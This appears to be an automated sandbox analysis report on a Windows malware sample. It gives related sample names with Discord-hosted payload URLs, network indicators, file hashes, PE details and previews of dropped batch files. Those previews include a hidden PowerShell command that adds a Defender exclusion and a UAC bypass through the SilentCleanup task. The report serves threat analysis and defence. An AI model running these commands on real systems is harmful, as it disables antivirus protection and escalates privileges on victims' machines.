	SkKcQaHEB8.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	P20200107.DOC	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	G019 & G022 SPEC SHEET.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	Marking Machine 30W Specification.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	2021 RFQ Products Required.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
	Company Reference1.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
	PAY SLIP.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
	part1.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	pmgTCd0btx.exe	Get hash	malicious	Browse	162.159.133.233
	tellimuse kinnitus.exe	Get hash	malicious	Browse	162.159.130.233
	pgzC7bbBhY.exe	Get hash	malicious	Browse	162.159.135.233
	vQ9OC4OdqY.exe	Get hash	malicious	Browse	162.159.133.233
	Untitled attachment 00032.exe	Get hash	malicious	Browse	162.159.133.233
	481U8az5O9.exe	Get hash	malicious	Browse	162.159.134.233
	85OZry2mNl.exe	Get hash	malicious	Browse	162.159.133.233
	mUlwg5WgCk.exe	Get hash	malicious	Browse	162.159.135.233
	PO_9084873737.PDF.exe	Get hash	malicious	Browse	162.159.135.233
	2BABA FFFFF (1).exe	Get hash	malicious	Browse	162.159.135.233
	Order confirmation.exe	Get hash	malicious	Browse	162.159.135.233
	dAZVcn7rdL.exe	Get hash	malicious	Browse	162.159.130.233
	Invoice Payment.exe	Get hash	malicious	Browse	162.159.133.233
	Se adjunta estado de cuenta.exe	Get hash	malicious	Browse	162.159.135.233
	u4vXf6jibw.exe	Get hash	malicious	Browse	162.159.133.233
	eQKtSrvq9p.exe	Get hash	malicious	Browse	162.159.129.233
	Ipqluvevqqbngnzereppsbtmvdwtmguxja.exe	Get hash	malicious	Browse	162.159.129.233
	setup_x86_x64_install.exe	Get hash	malicious	Browse	162.159.129.233
	IMG100897 TWI-SHA 202102 SHEETS.exe	Get hash	malicious	Browse	162.159.133.233
	YOYcBVf00S.exe	Get hash	malicious	Browse	162.159.130.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	e8vos5QOAj.exe	Get hash	malicious	Browse	104.16.12.194
	pmgTCd0btx.exe	Get hash	malicious	Browse	162.159.133.233
	5Zebq6UNKC.exe	Get hash	malicious	Browse	23.227.38.74
	tellimuse kinnitus.exe	Get hash	malicious	Browse	162.159.130.233
	pgzC7bbBhY.exe	Get hash	malicious	Browse	162.159.135.233
	PrDrdvELn2.exe	Get hash	malicious	Browse	172.67.176.216
	Message.html	Get hash	malicious	Browse	104.16.18.94
	Wire Transfer Slip.exe	Get hash	malicious	Browse	104.21.19.200
	vQ9OC4OdqY.exe	Get hash	malicious	Browse	162.159.133.233
	Untitled attachment 00032.exe	Get hash	malicious	Browse	162.159.133.233
	dec.exe	Get hash	malicious	Browse	104.21.28.86
	Purchase Order PO000037189.xls.html	Get hash	malicious	Browse	104.18.102.194
	BARI MEDI ORDER INQUIRY 3756653_PDF.exe	Get hash	malicious	Browse	104.21.19.200
	34567892.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.W32.AIDetect.malware2.21009.exe	Get hash	malicious	Browse	104.21.17.146
	YHxYLP4JYK.exe	Get hash	malicious	Browse	172.67.176.216
	AWB 2617429350,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	in7BcpKNoa.exe	Get hash	malicious	Browse	172.67.176.216
	FRGgs09s5v.exe	Get hash	malicious	Browse	104.21.17.146
	481U8az5O9.exe	Get hash	malicious	Browse	162.159.134.233

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	otJgx8JkpE.exe	Get hash	malicious	Browse	162.159.130.233
	PYfDeD0PyX.exe	Get hash	malicious	Browse	162.159.130.233
	(10.08.2021)SLKE.vbs	Get hash	malicious	Browse	162.159.130.233
	tellimuse kinnitus.exe	Get hash	malicious	Browse	162.159.130.233
	Edge.js	Get hash	malicious	Browse	162.159.130.233
	pgzC7bbBhY.exe	Get hash	malicious	Browse	162.159.130.233
	Edge.js	Get hash	malicious	Browse	162.159.130.233
	Message.html	Get hash	malicious	Browse	162.159.130.233
	vQ9OC4OdqY.exe	Get hash	malicious	Browse	162.159.130.233
	Untitled attachment 00032.exe	Get hash	malicious	Browse	162.159.130.233
	8ZnPKiDBQa.exe	Get hash	malicious	Browse	162.159.130.233
	SvmhQnz5E2.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.W32.AIDetect.malware1.32515.exe	Get hash	malicious	Browse	162.159.130.233
	in7BcpKNoa.exe	Get hash	malicious	Browse	162.159.130.233
	Jl7TdlxE2X.exe	Get hash	malicious	Browse	162.159.130.233
	481U8az5O9.exe	Get hash	malicious	Browse	162.159.130.233
	ABB98RdRjb.exe	Get hash	malicious	Browse	162.159.130.233
	P. OFERTA 211008 Balearia Eurolineas Maritimas, S.A.exe	Get hash	malicious	Browse	162.159.130.233
	PO_9084873737.PDF.exe	Get hash	malicious	Browse	162.159.130.233
	Order confirmation.exe	Get hash	malicious	Browse	162.159.130.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe	85OZry2mNl.exe	Get hash	malicious	Browse
	mUlwg5WgCk.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\Public\KDECO.bat Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Trast.bat Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.314972767530033
Encrypted:	false
SSDEEP:	3:LjTnaHF5wlM:rnaHSM
MD5:	4068C9F69FCD8A171C67F81D4A952A54
SHA1:	4D2536A8C28CDCC17465E20D6693FB9E8E713B36
SHA-256:	24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
SHA-512:	A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
Malicious:	false
Preview:	start /min C:\Users\Public\UKO.bat

C:\Users\Public\UKO.bat Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.865356627324657
Encrypted:	false
SSDEEP:	6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
MD5:	EAF8D967454C3BBDDBF2E05A421411F8
SHA1:	6170880409B24DE75C2DC3D56A506FBFF7F6622C
SHA-256:	F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
SHA-512:	FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
Malicious:	false
Preview:	reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..

C:\Users\Public\nest Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:QQJyn:Qgyn
MD5:	A4FB8B71D0FC27C4B4D69F77A7353AB8
SHA1:	4BD36DA388173699C10F388DBA106FC86AC513B7
SHA-256:	E918EDFC622A52B0BBFA8754F95DF6F469105C66E8058C4C412D18CEC6EA5E54
SHA-512:	274C1D9BE15632FC3A80A7B64A9A9CCD9CF744FECC3A05B8E121748E8F3E73190338685A09C9ADBC8F2B0A6A1322885C325494208EC8CA322A0E81ECB56C3C96
Malicious:	false
Preview:	Lnouxqk..

C:\Users\Public\nest.bat Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.263285494083192
Encrypted:	false
SSDEEP:	3:LjT9fnMXdemzCK0vn:rZnMXd1CV
MD5:	8ADA51400B7915DE2124BAAF75E3414C
SHA1:	1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
SHA-256:	45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
SHA-512:	9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
Malicious:	false
Preview:	start /min reg delete hkcu\Environment /v windir /f..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Lnouxqkbbgkvxwmwtigvjxpvnenadlc[1] Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	data
Category:	dropped
Size (bytes):	128000
Entropy (8bit):	7.9781891482236285
Encrypted:	false
SSDEEP:	3072:NQr/mIsIhGMs6z4PU68TXvdIbmYKNEl+bR0RDz/Nur0S:2Pu8TXVIipNEl+yRDz16J
MD5:	F82884CC5E7CF22E9702ADBFC1F12BEE
SHA1:	5E8D547DFFE7611C737189CE22BB1A8393953E5D
SHA-256:	BE474ECE5C1A58BD3C86F1CE8E7FAB9049AEADBCA5E4690E00D0751153F55F72
SHA-512:	4BFA17059270DC17A0A9519EC989675116E869CDB6A1B68009C9E737E17DD2CC99CEA17CC2DB4798B25F3F888B2207F8B5F5360FDF847AE2850B79AFF781244E
Malicious:	false
Preview:	..9...q.k.%.."^.#..T.....4....o...$X....m.......L5.8.5..6....M....v..~......4...)..Y4...t..S{?."2...geo.4...'.v....G..<.cgn.R.X........u.8..1.)..@.6(t..k...L(u....r.~.uu;......ca\|.J%.\.2f..~..E....X....u.8..1.)..@.6(t..k...L(u....r.~.uu;......ca\|.J%.\.2f..~..E....X....u.8..o.....:v..aT..p:z..[.L. 9...$aQx...yX..z..D.U>qeD..<q).n...A...L.)..3o..N..p.v^..R.g..X.B....=...T.)..T...=.;....?..v...cO/...m`....Z.JP.h...........f..~.a......\..W<,.wO3..;.w^.......4-....N.....r.j....P.M...j.l..\|..Y+..q,...q:wO{......Y?...+..\..Wn.P.uo,T. e^.#.:sq,...q:wO{......Y?...+..\....7..(.......FDK.I.<yM....<q}.1.-.......a.....=......p.l....].[.L.U9....l.n...v..~.!.K.Z..HC.C.C....K...8o.R.].n.>d..C...<,.\|...P.2DO.c.0BOs-....f..+..mi-....N.....r.j....P...K..Wk<}..+.K.^.o`..Wx...g.,^..W5....";....=..wOs-....f..8\|.n...j...9.l..?...+..\..Wn.P.uo,T. e..!.3...<yM....<q}.1.ot....v.../.q/......r.-....f..8\|.n...j...9.l..?...+..\..Wn.P.uo,T. e..!.3...<yM....<q}.1.o

C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1195008
Entropy (8bit):	6.86203096819729
Encrypted:	false
SSDEEP:	12288:ya88qKSZvx8Lj1uE/FW/OolPkFZkmy08EsuIyOonA6hqsn4YPqyBO/JPcjSTdP3D:yaNEiX1uC7oDA9xXAJmPTY/Jke
MD5:	A003B564BD23880F99A29006E780A89B
SHA1:	8465374554A0C6C02F7914C1278AFD79E96ED8C4
SHA-256:	5BC09C3C2A751169A32CF97A62765F127BCE2D0EADCE3481A6A831B6FDCC044E
SHA-512:	0727CF12C3DD9553AFA28CDD3DE5C6970EC4F18F2CB77D437D26AEE71B8C79178209ADB3429151271EC37EE04E37C64E7FBB8C061BBF1C78F59601AEFCF3431B
Malicious:	true
Joe Sandbox View:	Filename: 85OZry2mNl.exe, Detection: malicious, Browse Filename: mUlwg5WgCk.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................v%...........................0.............................. ......................................................CODE....L........................... ..`DATA................................@...BSS......................................idata..v%.......&..................@....tls.....................................rdata....... ......................@..P.reloc......0......................@..P.rsrc................~..............@..P.....................<..............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\hTu8FeYy28.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.86203096819729
TrID:	Win32 Executable (generic) a (10002005/4) 91.23% Win32 Executable Borland Delphi 7 (665061/41) 6.07% Win32 Executable Borland Delphi 6 (262906/60) 2.40% Win32 Executable Delphi generic (14689/80) 0.13% Windows Screen Saver (13104/52) 0.12%
File name:	hTu8FeYy28.exe
File size:	1195008
MD5:	a003b564bd23880f99a29006e780a89b
SHA1:	8465374554a0c6c02f7914c1278afd79e96ed8c4
SHA256:	5bc09c3c2a751169a32cf97a62765f127bce2d0eadce3481a6a831b6fdcc044e
SHA512:	0727cf12c3dd9553afa28cdd3de5c6970ec4f18f2cb77d437d26aee71b8c79178209adb3429151271ec37ee04e37c64e7fbb8c061bbf1c78f59601aefcf3431b
SSDEEP:	12288:ya88qKSZvx8Lj1uE/FW/OolPkFZkmy08EsuIyOonA6hqsn4YPqyBO/JPcjSTdP3D:yaNEiX1uC7oDA9xXAJmPTY/Jke
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	c4c0d4d4d4d4d4d4

Static PE Info

General
Entrypoint:	0x48ab04
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c7742f6c154c117ccc5799912fd8bda5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0048A894h
call 00007F7CCCD858DDh
mov eax, dword ptr [0048C534h]
mov eax, dword ptr [eax]
call 00007F7CCCDE52E9h
mov ecx, dword ptr [0048C2C4h]
mov eax, dword ptr [0048C534h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00489924h]
call 00007F7CCCDE52E9h
mov eax, dword ptr [0048C534h]
mov eax, dword ptr [eax]
call 00007F7CCCDE535Dh
call 00007F7CCCD8366Ch
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8e000	0x2576	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9d000	0x8be00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x93000	0x9cd0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x92000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x89b4c	0x89c00	False	0.509742584505	data	6.51923560789	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x8b000	0x16f8	0x1800	False	0.423828125	data	4.01362753631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x8d000	0xda1	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x8e000	0x2576	0x2600	False	0.370065789474	data	5.02180680424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x91000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x92000	0x18	0x200	False	0.05078125	data	0.199107517787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x93000	0x9cd0	0x9e00	False	0.568581882911	data	6.65365883915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x9d000	0x8be00	0x8be00	False	0.360902242516	data	6.29042128065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
ZRCU	0x9dbe0	0x3da59	PC bitmap, Windows 3.x format, 500 x 294 x 8	English	United States
RT_CURSOR	0xdb63c	0x134	data
RT_CURSOR	0xdb770	0x134	data
RT_CURSOR	0xdb8a4	0x134	data
RT_CURSOR	0xdb9d8	0x134	data
RT_CURSOR	0xdbb0c	0x134	data
RT_CURSOR	0xdbc40	0x134	data
RT_CURSOR	0xdbd74	0x134	data
RT_BITMAP	0xdbea8	0x1d0	data
RT_BITMAP	0xdc078	0x1e4	data
RT_BITMAP	0xdc25c	0x1d0	data
RT_BITMAP	0xdc42c	0x1d0	data
RT_BITMAP	0xdc5fc	0x44c14	data	English	United States
RT_BITMAP	0x121210	0x1d0	data
RT_BITMAP	0x1213e0	0x1d0	data
RT_BITMAP	0x1215b0	0x1d0	data
RT_BITMAP	0x121780	0x1d0	data
RT_BITMAP	0x121950	0x1d0	data
RT_BITMAP	0x121b20	0x1d0	data
RT_BITMAP	0x121cf0	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x121dd8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x122240	0x10a8	data	English	United States
RT_ICON	0x1232e8	0x25a8	data	English	United States
RT_DIALOG	0x125890	0x52	data
RT_STRING	0x1258e4	0x1a0	data
RT_STRING	0x125a84	0x4e4	data
RT_STRING	0x125f68	0x1f0	data
RT_STRING	0x126158	0x1c0	data
RT_STRING	0x126318	0xdc	data
RT_STRING	0x1263f4	0x488	data
RT_STRING	0x12687c	0xc0	data
RT_STRING	0x12693c	0xfc	data
RT_STRING	0x126a38	0x120	data
RT_STRING	0x126b58	0x434	data
RT_STRING	0x126f8c	0x3f0	data
RT_STRING	0x12737c	0x3e4	data
RT_STRING	0x127760	0x410	data
RT_STRING	0x127b70	0x1b0	data
RT_STRING	0x127d20	0xec	data
RT_STRING	0x127e0c	0x1e4	data
RT_STRING	0x127ff0	0x3e8	data
RT_STRING	0x1283d8	0x358	data
RT_STRING	0x128730	0x2b4	data
RT_RCDATA	0x1289e4	0x10	data
RT_RCDATA	0x1289f4	0x320	data
RT_GROUP_CURSOR	0x128d14	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x128d28	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x128d3c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x128d50	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x128d64	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x128d78	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x128d8c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x128da0	0x30	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey, GetUserNameA
kernel32.dll	lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, 